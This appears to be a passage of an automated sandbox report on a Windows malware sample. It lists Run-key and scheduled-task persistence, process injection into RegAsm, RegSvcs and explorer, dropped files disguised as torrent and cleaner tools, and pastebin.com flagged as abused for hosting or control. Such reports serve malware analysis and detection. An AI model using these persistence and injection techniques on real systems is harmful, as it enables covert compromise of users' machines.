N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4572 set thread context of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2944 set thread context of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5092 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 set thread context of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2816 set thread context of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2352 set thread context of 4592 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4776 set thread context of 4904 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3968 set thread context of 3772 N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2728 set thread context of 2284 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2140 set thread context of 3936 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\SysWOW64\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\SysWOW64\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\SysWOW64\Taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2944 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2944 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2944 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2944 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2944 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2944 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2944 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2944 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2944 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2944 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2944 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2944 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 4572 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4572 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4572 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4572 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4572 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2944 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2944 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2944 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2944 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2944 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 4572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 4572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2944 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2944 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2944 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 768 wrote to memory of 4452 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 768 wrote to memory of 4452 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 768 wrote to memory of 4452 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 2776 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2776 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 5064 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 5064 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
